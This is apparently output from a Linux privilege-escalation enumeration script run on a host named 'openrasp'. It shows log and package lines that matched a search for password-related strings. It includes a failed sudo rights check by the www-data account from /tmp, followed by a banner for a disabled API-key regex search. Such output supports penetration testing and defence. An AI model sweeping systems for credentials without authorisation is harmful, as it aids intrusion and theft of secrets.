Binary file /var/log/journal/39760a7463374eb2bb1ad89f26f4a02f/system@0006543c28519c1b-35397f6107c95f57.journal~ matches
Binary file /var/log/syslog.1 matches
Jun 14 20:46:03 openrasp sudo: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jun 14 20:46:03 openrasp sudo: www-data : command not allowed ; TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=list
Mar 18 13:45:50 openrasp sudo:   ubuntu : TTY=tty1 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/bash
Mar 18 13:48:30 openrasp systemd[1]: Condition check resulted in Forward Password Requests to Plymouth Directory Watch being skipped.
Mar 18 13:48:30 openrasp systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Preparing to unpack .../base-passwd_3.5.47_amd64.deb ...
Preparing to unpack .../passwd_1%3a4.8.1-1ubuntu5_amd64.deb ...
Selecting previously unselected package base-passwd.
Selecting previously unselected package passwd.
Setting up base-passwd (3.5.47) ...
Setting up passwd (1:4.8.1-1ubuntu5) ...
Shadow passwords are now on.
Unpacking base-passwd (3.5.47) ...
Unpacking base-passwd (3.5.47) over (3.5.47) ...
Unpacking passwd (1:4.8.1-1ubuntu5) ...
[    3.500631] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[    6.606112] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
dpkg: base-passwd: dependency problems, but configuring anyway as you requested:



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r' 

